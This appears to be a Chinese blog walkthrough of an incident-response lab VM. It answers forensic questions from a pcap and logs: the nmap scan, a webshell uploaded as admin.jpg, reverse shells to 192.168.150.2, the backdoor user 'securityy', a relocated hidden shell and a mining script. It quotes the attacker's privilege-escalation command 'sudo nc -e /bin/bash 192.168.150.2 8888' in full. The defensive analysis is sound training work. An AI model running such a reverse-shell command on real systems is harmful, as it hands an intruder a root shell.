当前位置: 首页 > ds >正文

应急响应基础模拟靶机-security1

PS:杰克创建在流量包(result.pcap)在根目录下,请根据已有信息进行分析

1、攻击者使用的端口扫描工具是?

2、通过流量及日志审计,攻击者上传shell的时访问web使用IP地址是多少?

3、审计流量日志,攻击者反弹shell的地址及端口?

4、攻击者使用的提权方式及工具是什么?

5、攻击者创建的新用户名是?

6、攻击者将shell删除并放到了其他web目录,文件名被改变了,找出它的绝对路径及文件名

7、攻击者使用新用户留下了木马进行不法行为,找出程序名,给出程序的绝对路径


用户名及密码:security/P@ssw0rd,将/result.pcap文件下载下来:


1、攻击者使用的端口扫描工具是?

过滤出http协议,看到User-Agent值出现了nmap关键词:

答案:nmap


2、通过流量及日志审计,攻击者上传shell的时访问web使用IP地址是多少?

Ctrl F搜索关键词“upload”,看到上传了admin.jpg并用“cmd”传参来执行system()函数执行命令which nc:

答案:192.168.150.1


3、审计流量日志,攻击者反弹shell的地址及端口?

继续Ctrl F搜索关键词“admin.jpg”,不断查找,发现反弹shell信息:

答案:192.168.150.2:4444


4、攻击者使用的提权方式及工具是什么?

执行命令journalctl _COMM=sudo > sudo.txt,使用systemd的系统查看sudo命令的历史,保存为sudo.txt文件:

打开搜索关键词“192.168.150.2”发现都有8888端口和nc命令:

答案:sudo nc -e /bin/bash 192.168.150.2 8888


5、攻击者创建的新用户名是?

打开虚拟机就能发现有别的用户“securityy”:

也可以通过命令“cat /etc/passwd”列出系统上的所有用户账号:

一样能看出有个securityy用户

答案:securityy


6、攻击者将shell删除并放到了其他web目录,文件名被改变了,找出它的绝对路径及文件名

继续在sudo.txt中查找关键词“mv”,发现securityy用户在/var/www/blog目录下创建了.ShEllHAha目录,并且将原本的shell从../html/uploads/admin.jpg移动到./.ShEllHAha/.hackba.php

答案:/var/www/blog/.ShEllHAha/.hackba.php


7、攻击者使用新用户留下了木马进行不法行为,找出程序名,给出程序的绝对路径

在第六问中,往下看刚好能看到有个Wakuang.sh(谐音挖矿)关键词,发现securityy用户在/opt目录下创建了.Qwert目录并创建了.Wakuang.sh文件:

答案:/opt/.Qwert/.Wakuang.sh

http://www.xdnf.cn/news/5032.html

相关文章:

  • Vue Router 3 使用详解:从零构建嵌套路由页面
  • MySQL 与 Elasticsearch 数据一致性方案
  • Java反射 八股版
  • 三个线程 a、b、c 并发运行,b,c 需要 a 线程的数据如何解决
  • 虚假AI工具通过Facebook广告传播新型Noodlophile窃密木马
  • 具身智能时代的机器人导航和操作仿真器综述
  • MySQL 8.0(主从复制)
  • Linux 内核中的 security_sk_free:安全模块与 Socket 释放机制解析
  • 02_线性模型(回归线性模型)
  • 图像匹配导航定位技术 第 10 章
  • 创始人 IP 的破局之道:从技术突围到生态重构的时代启示|创客匠人评述
  • Skype已停服!
  • 文件包含2
  • 人工智能基础知识笔记八:数据预处理
  • 【K8S系列】Kubernetes常用 命令
  • Java学习手册:单体架构到微服务演进
  • PCA降维
  • Linux 文件目录管理常用命令
  • 如何减少极狐GitLab 容器镜像库存储?
  • 基于卷积神经网络和Pyqt5的猫狗识别小程序
  • Femap许可使用数据分析
  • NestJS 框架深度解析
  • 《让歌声跨越山海:Flutter借助Agora SDK实现高质量连麦合唱》
  • 力扣题解:21.合并两个有序链表(C语言)
  • 对遗传算法思想的理解与实例详解
  • Redis 主从复制集群搭建教程
  • 基于vue框架的电子商城m8qu8(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
  • 构筑芯片行业的“安全硅甲”
  • SSL证书格式详解:PEM、CER、DER、JKS、PKCS12等
  • k8s之探针